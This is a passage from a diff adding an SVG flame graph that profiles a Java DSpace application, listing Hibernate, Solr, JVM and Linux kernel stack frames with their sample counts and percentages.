+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (25 samples, 3.70%)</title><rect x="849.6" y="517" width="43.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="852.62" y="527.5" >org/..</text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%)</title><rect x="1144.6" y="437" width="1.8" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="1147.62" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::containsKey (3 samples, 0.44%)</title><rect x="982.3" y="533" width="5.2" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="985.28" y="543.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.15%)</title><rect x="980.5" y="517" width="1.8" height="15.0" fill="rgb(67,215,67)" rx="2" ry="2" />
+<text  x="983.53" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (3 samples, 0.44%)</title><rect x="1099.2" y="437" width="5.3" height="15.0" fill="rgb(95,242,95)" rx="2" ry="2" />
+<text  x="1102.23" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::writeDocument (15 samples, 2.22%)</title><rect x="943.9" y="565" width="26.2" height="15.0" fill="rgb(79,226,79)" rx="2" ry="2" />
+<text  x="946.88" y="575.5" >o..</text>
+</g>
+<g >
+<title>pick_next_task_fair (1 samples, 0.15%)</title><rect x="462.1" y="773" width="1.7" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="465.10" y="783.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (79 samples, 11.69%)</title><rect x="106.0" y="869" width="137.9" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="109.01" y="879.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>ip_finish_output2 (1 samples, 0.15%)</title><rect x="472.6" y="757" width="1.7" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="475.57" y="767.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (1 samples, 0.15%)</title><rect x="1074.8" y="405" width="1.7" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="1077.79" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::append (3 samples, 0.44%)</title><rect x="945.6" y="373" width="5.3" height="15.0" fill="rgb(94,241,94)" rx="2" ry="2" />
+<text  x="948.62" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (16 samples, 2.37%)</title><rect x="216.0" y="709" width="27.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="218.98" y="719.5" >[..</text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (3 samples, 0.44%)</title><rect x="818.2" y="453" width="5.2" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="821.20" y="463.5" ></text>
+</g>
+<g >
+<title>__mark_inode_dirty (1 samples, 0.15%)</title><rect x="945.6" y="101" width="1.8" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="948.62" y="111.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (79 samples, 11.69%)</title><rect x="106.0" y="901" width="137.9" height="15.0" fill="rgb(212,68,68)" rx="2" ry="2" />
+<text  x="109.01" y="911.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.15%)</title><rect x="936.9" y="469" width="1.7" height="15.0" fill="rgb(101,246,101)" rx="2" ry="2" />
+<text  x="939.89" y="479.5" ></text>
+</g>
+<g >
+<title>tcp_current_mss (1 samples, 0.15%)</title><rect x="524.9" y="789" width="1.8" height="15.0" fill="rgb(244,115,115)" rx="2" ry="2" />
+<text  x="527.94" y="799.5" ></text>
+</g>
+<g >
+<title>update_process_times (1 samples, 0.15%)</title><rect x="514.5" y="357" width="1.7" height="15.0" fill="rgb(214,70,70)" rx="2" ry="2" />
+<text  x="517.47" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/CriteriaImpl:::isLookupByNaturalKey (1 samples, 0.15%)</title><rect x="1048.6" y="501" width="1.8" height="15.0" fill="rgb(107,253,107)" rx="2" ry="2" />
+<text  x="1051.61" y="511.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="236.9" y="565" width="5.3" height="15.0" fill="rgb(250,124,124)" rx="2" ry="2" />
+<text  x="239.92" y="575.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::doLoad (2 samples, 0.30%)</title><rect x="912.5" y="485" width="3.4" height="15.0" fill="rgb(53,202,53)" rx="2" ry="2" />
+<text  x="915.46" y="495.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.15%)</title><rect x="929.9" y="469" width="1.8" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="932.91" y="479.5" ></text>
+</g>
+<g >
+<title>__pthread_mutex_unlock_usercnt (1 samples, 0.15%)</title><rect x="327.7" y="821" width="1.7" height="15.0" fill="rgb(223,83,83)" rx="2" ry="2" />
+<text  x="330.69" y="831.5" ></text>
+</g>
+<g >
+<title>org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (1 samples, 0.15%)</title><rect x="737.9" y="421" width="1.7" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="740.90" y="431.5" ></text>
+</g>
+<g >
+<title>[unknown] (20 samples, 2.96%)</title><rect x="10.0" y="917" width="34.9" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="13.00" y="927.5" >[u..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="309" width="1.7" height="15.0" fill="rgb(206,60,60)" rx="2" ry="2" />
+<text  x="241.67" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/DefaultThrowableRenderer:::render (1 samples, 0.15%)</title><rect x="950.9" y="341" width="1.7" height="15.0" fill="rgb(68,216,68)" rx="2" ry="2" />
+<text  x="953.86" y="351.5" ></text>
+</g>
+<g >
+<title>syscall_trace_enter (1 samples, 0.15%)</title><rect x="350.4" y="853" width="1.7" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="353.38" y="863.5" ></text>
+</g>
+<g >
+<title>vfs_write (1 samples, 0.15%)</title><rect x="945.6" y="197" width="1.8" height="15.0" fill="rgb(207,61,61)" rx="2" ry="2" />
+<text  x="948.62" y="207.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::printStackTrace (1 samples, 0.15%)</title><rect x="947.4" y="293" width="1.7" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="950.37" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (5 samples, 0.74%)</title><rect x="1167.3" y="501" width="8.7" height="15.0" fill="rgb(70,219,70)" rx="2" ry="2" />
+<text  x="1170.31" y="511.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="357" width="3.5" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="241.67" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.15%)</title><rect x="1067.8" y="389" width="1.8" height="15.0" fill="rgb(92,238,92)" rx="2" ry="2" />
+<text  x="1070.81" y="399.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (4 samples, 0.59%)</title><rect x="971.8" y="501" width="7.0" height="15.0" fill="rgb(54,204,54)" rx="2" ry="2" />
+<text  x="974.80" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.15%)</title><rect x="903.7" y="453" width="1.8" height="15.0" fill="rgb(69,217,69)" rx="2" ry="2" />
+<text  x="906.73" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (3 samples, 0.44%)</title><rect x="964.8" y="517" width="5.3" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="967.82" y="527.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="236.9" y="629" width="5.3" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="239.92" y="639.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (6 samples, 0.89%)</title><rect x="1165.6" y="533" width="10.4" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="1168.56" y="543.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1052.1" y="421" width="1.7" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="1055.10" y="431.5" ></text>
+</g>
+<g >
+<title>Finalizer (16 samples, 2.37%)</title><rect x="243.9" y="933" width="27.9" height="15.0" fill="rgb(214,70,70)" rx="2" ry="2" />
+<text  x="246.91" y="943.5" >F..</text>
+</g>
+<g >
+<title>Interpreter (372 samples, 55.03%)</title><rect x="528.4" y="645" width="649.4" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="531.43" y="655.5" >Interpreter</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (7 samples, 1.04%)</title><rect x="1057.3" y="421" width="12.3" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="1060.34" y="431.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.15%)</title><rect x="359.1" y="709" width="1.8" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="362.11" y="719.5" ></text>
+</g>
+<g >
+<title>tcp_recvmsg (15 samples, 2.22%)</title><rect x="472.6" y="821" width="26.2" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="475.57" y="831.5" >t..</text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::immediateLoad (2 samples, 0.30%)</title><rect x="912.5" y="549" width="3.4" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="915.46" y="559.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="245" width="1.7" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="241.67" y="255.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (16 samples, 2.37%)</title><rect x="294.5" y="741" width="28.0" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="297.53" y="751.5" >_..</text>
+</g>
+<g >
+<title>ipv4_confirm (1 samples, 0.15%)</title><rect x="521.4" y="693" width="1.8" height="15.0" fill="rgb(207,60,60)" rx="2" ry="2" />
+<text  x="524.45" y="703.5" ></text>
+</g>
+<g >
+<title>[libjli.so] (372 samples, 55.03%)</title><rect x="528.4" y="901" width="649.4" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="531.43" y="911.5" >[libjli.so]</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (7 samples, 1.04%)</title><rect x="919.4" y="517" width="12.3" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="922.44" y="527.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="277" width="1.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="241.67" y="287.5" ></text>
+</g>
+<g >
+<title>sk_wait_data (14 samples, 2.07%)</title><rect x="474.3" y="805" width="24.5" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="477.32" y="815.5" >s..</text>
+</g>
+<g >
+<title>schedule (18 samples, 2.66%)</title><rect x="292.8" y="805" width="31.4" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="295.78" y="815.5" >sc..</text>
+</g>
+<g >
+<title>java/lang/Throwable:::&lt;init&gt; (1 samples, 0.15%)</title><rect x="1167.3" y="229" width="1.8" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="1170.31" y="239.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingConnection:::prepareStatement (1 samples, 0.15%)</title><rect x="929.9" y="485" width="1.8" height="15.0" fill="rgb(58,208,58)" rx="2" ry="2" />
+<text  x="932.91" y="495.5" ></text>
+</g>
+<g >
+<title>java/io/SequenceInputStream:::nextStream (4 samples, 0.59%)</title><rect x="945.6" y="517" width="7.0" height="15.0" fill="rgb(92,238,92)" rx="2" ry="2" />
+<text  x="948.62" y="527.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1167.3" y="149" width="1.8" height="15.0" fill="rgb(204,55,55)" rx="2" ry="2" />
+<text  x="1170.31" y="159.5" ></text>
+</g>
+<g >
+<title>syscall_trace_enter (1 samples, 0.15%)</title><rect x="498.8" y="869" width="1.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="501.76" y="879.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.15%)</title><rect x="514.5" y="437" width="1.7" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="517.47" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/DefaultThrowableRenderer:::render (1 samples, 0.15%)</title><rect x="947.4" y="325" width="1.7" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="950.37" y="335.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="324.2" y="869" width="5.2" height="15.0" fill="rgb(212,67,67)" rx="2" ry="2" />
+<text  x="327.20" y="879.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="895.0" y="469" width="1.7" height="15.0" fill="rgb(204,55,55)" rx="2" ry="2" />
+<text  x="898.00" y="479.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (19 samples, 2.81%)</title><rect x="10.0" y="821" width="33.2" height="15.0" fill="rgb(224,86,86)" rx="2" ry="2" />
+<text  x="13.00" y="831.5" >fu..</text>
+</g>
+<g >
+<title>JVM_InvokeMethod (372 samples, 55.03%)</title><rect x="528.4" y="725" width="649.4" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="531.43" y="735.5" >JVM_InvokeMethod</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1153.3" y="437" width="1.8" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="1156.34" y="447.5" ></text>
+</g>
+<g >
+<title>ip_local_deliver (3 samples, 0.44%)</title><rect x="511.0" y="565" width="5.2" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="513.98" y="575.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (10 samples, 1.48%)</title><rect x="573.8" y="517" width="17.5" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="576.82" y="527.5" ></text>
+</g>
+<g >
+<title>ctx_sched_in (1 samples, 0.15%)</title><rect x="460.4" y="741" width="1.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="463.36" y="751.5" ></text>
+</g>
+<g >
+<title>Interpreter (372 samples, 55.03%)</title><rect x="528.4" y="757" width="649.4" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="531.43" y="767.5" >Interpreter</text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.15%)</title><rect x="1025.9" y="453" width="1.8" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="1028.92" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (4 samples, 0.59%)</title><rect x="650.6" y="469" width="7.0" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="653.62" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="289.3" y="821" width="1.7" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="292.29" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeXML (2 samples, 0.30%)</title><rect x="961.3" y="453" width="3.5" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="964.33" y="463.5" ></text>
+</g>
+<g >
+<title>do_IRQ (1 samples, 0.15%)</title><rect x="1113.2" y="421" width="1.7" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="1116.20" y="431.5" ></text>
+</g>
+<g >
+<title>futex_wait (18 samples, 2.66%)</title><rect x="292.8" y="837" width="31.4" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="295.78" y="847.5" >fu..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="940.4" y="421" width="1.7" height="15.0" fill="rgb(224,86,86)" rx="2" ry="2" />
+<text  x="943.38" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.15%)</title><rect x="900.2" y="437" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="903.24" y="447.5" ></text>
+</g>
+<g >
+<title>native_write_msr (1 samples, 0.15%)</title><rect x="359.1" y="645" width="1.8" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="362.11" y="655.5" ></text>
+</g>
+<g >
+<title>event_sched_in.isra.0.part.0 (1 samples, 0.15%)</title><rect x="322.5" y="709" width="1.7" height="15.0" fill="rgb(213,70,70)" rx="2" ry="2" />
+<text  x="325.46" y="719.5" ></text>
+</g>
+<g >
+<title>org/dspace/authorize/dao/impl/ResourcePolicyDAOImpl:::findByDSoAndAction (39 samples, 5.77%)</title><rect x="987.5" y="549" width="68.1" height="15.0" fill="rgb(67,216,67)" rx="2" ry="2" />
+<text  x="990.51" y="559.5" >org/dsp..</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::prepareQueryStatement (1 samples, 0.15%)</title><rect x="929.9" y="501" width="1.8" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="932.91" y="511.5" ></text>
+</g>
+<g >
+<title>process_backlog (6 samples, 0.89%)</title><rect x="511.0" y="613" width="10.4" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="513.98" y="623.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/EntitySerializer:::serialize (2 samples, 0.30%)</title><rect x="954.3" y="421" width="3.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="957.35" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultConfigurationKey$KeyIterator:::nextKey (1 samples, 0.15%)</title><rect x="1156.8" y="501" width="1.8" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="1159.83" y="511.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::doCreateBean (2 samples, 0.30%)</title><rect x="1148.1" y="501" width="3.5" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="1151.11" y="511.5" ></text>
+</g>
+<g >
+<title>schedule (56 samples, 8.28%)</title><rect x="367.8" y="805" width="97.8" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="370.84" y="815.5" >schedule</text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="359.1" y="885" width="5.2" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="362.11" y="895.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.15%)</title><rect x="240.4" y="325" width="1.8" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="243.41" y="335.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.15%)</title><rect x="242.2" y="645" width="1.7" height="15.0" fill="rgb(211,67,67)" rx="2" ry="2" />
+<text  x="245.16" y="655.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::getCollectionEntry (1 samples, 0.15%)</title><rect x="542.4" y="437" width="1.7" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="545.40" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="324.2" y="901" width="5.2" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="327.20" y="911.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (2 samples, 0.30%)</title><rect x="580.8" y="405" width="3.5" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="583.80" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (2 samples, 0.30%)</title><rect x="888.0" y="469" width="3.5" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="891.02" y="479.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="849.6" y="501" width="1.8" height="15.0" fill="rgb(224,86,86)" rx="2" ry="2" />
+<text  x="852.62" y="511.5" ></text>
+</g>
+<g >
+<title>Interpreter (372 samples, 55.03%)</title><rect x="528.4" y="805" width="649.4" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="531.43" y="815.5" >Interpreter</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.15%)</title><rect x="980.5" y="389" width="1.8" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="983.53" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="929.9" y="453" width="1.8" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="932.91" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="197" width="1.7" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="241.67" y="207.5" ></text>
+</g>
+<g >
+<title>group_sched_in (1 samples, 0.15%)</title><rect x="460.4" y="725" width="1.7" height="15.0" fill="rgb(211,67,67)" rx="2" ry="2" />
+<text  x="463.36" y="735.5" ></text>
+</g>
+<g >
+<title>__fget (1 samples, 0.15%)</title><rect x="505.7" y="821" width="1.8" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="508.74" y="831.5" ></text>
+</g>
+<g >
+<title>__x64_sys_poll (4 samples, 0.59%)</title><rect x="1169.1" y="309" width="6.9" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="1172.05" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentBag:::iterator (2 samples, 0.30%)</title><rect x="938.6" y="533" width="3.5" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="941.64" y="543.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (8 samples, 1.18%)</title><rect x="271.8" y="757" width="14.0" height="15.0" fill="rgb(208,61,61)" rx="2" ry="2" />
+<text  x="274.83" y="767.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::resolve (1 samples, 0.15%)</title><rect x="936.9" y="405" width="1.7" height="15.0" fill="rgb(69,217,69)" rx="2" ry="2" />
+<text  x="939.89" y="415.5" ></text>
+</g>
+<g >
+<title>wait_woken (14 samples, 2.07%)</title><rect x="474.3" y="789" width="24.5" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="477.32" y="799.5" >w..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="405" width="3.5" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="241.67" y="415.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (12 samples, 1.78%)</title><rect x="329.4" y="741" width="21.0" height="15.0" fill="rgb(212,68,68)" rx="2" ry="2" />
+<text  x="332.44" y="751.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.15%)</title><rect x="968.3" y="325" width="1.8" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="971.31" y="335.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="437" width="3.5" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="241.67" y="447.5" ></text>
+</g>
+<g >
+<title>preempt_count_sub.constprop.0 (1 samples, 0.15%)</title><rect x="463.8" y="789" width="1.8" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="466.85" y="799.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (4 samples, 0.59%)</title><rect x="624.4" y="437" width="7.0" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="627.44" y="447.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (4 samples, 0.59%)</title><rect x="1169.1" y="213" width="6.9" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="1172.05" y="223.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (2 samples, 0.30%)</title><rect x="909.0" y="453" width="3.5" height="15.0" fill="rgb(65,213,65)" rx="2" ry="2" />
+<text  x="911.96" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/FullTextContentStreams$FullTextEnumeration:::nextElement (4 samples, 0.59%)</title><rect x="945.6" y="485" width="7.0" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="948.62" y="495.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.15%)</title><rect x="359.1" y="757" width="1.8" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="362.11" y="767.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::info (1 samples, 0.15%)</title><rect x="917.7" y="565" width="1.7" height="15.0" fill="rgb(94,241,94)" rx="2" ry="2" />
+<text  x="920.69" y="575.5" ></text>
+</g>
+<g >
+<title>start_thread (3 samples, 0.44%)</title><rect x="359.1" y="917" width="5.2" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="362.11" y="927.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (1 samples, 0.15%)</title><rect x="584.3" y="437" width="1.7" height="15.0" fill="rgb(105,251,105)" rx="2" ry="2" />
+<text  x="587.29" y="447.5" ></text>
+</g>
+<g >
+<title>__dev_queue_xmit (1 samples, 0.15%)</title><rect x="509.2" y="693" width="1.8" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="512.23" y="703.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.15%)</title><rect x="683.8" y="453" width="1.7" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="686.79" y="463.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.15%)</title><rect x="929.9" y="405" width="1.8" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="932.91" y="415.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (12 samples, 1.78%)</title><rect x="243.9" y="821" width="21.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="246.91" y="831.5" ></text>
+</g>
+<g >
+<title>VM_Thread (20 samples, 2.96%)</title><rect x="329.4" y="933" width="34.9" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="332.44" y="943.5" >VM..</text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (8 samples, 1.18%)</title><rect x="530.2" y="533" width="13.9" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="533.18" y="543.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group_$$_jvst722_1e:::getHibernateLazyInitializer (2 samples, 0.30%)</title><rect x="736.2" y="437" width="3.4" height="15.0" fill="rgb(62,211,62)" rx="2" ry="2" />
+<text  x="739.15" y="447.5" ></text>
+</g>
+<g >
+<title>schedule (34 samples, 5.03%)</title><rect x="44.9" y="805" width="59.4" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="47.91" y="815.5" >schedule</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::loadFromDatasource (2 samples, 0.30%)</title><rect x="912.5" y="469" width="3.4" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="915.46" y="479.5" ></text>
+</g>
+<g >
+<title>__sys_sendto (14 samples, 2.07%)</title><rect x="504.0" y="853" width="24.4" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
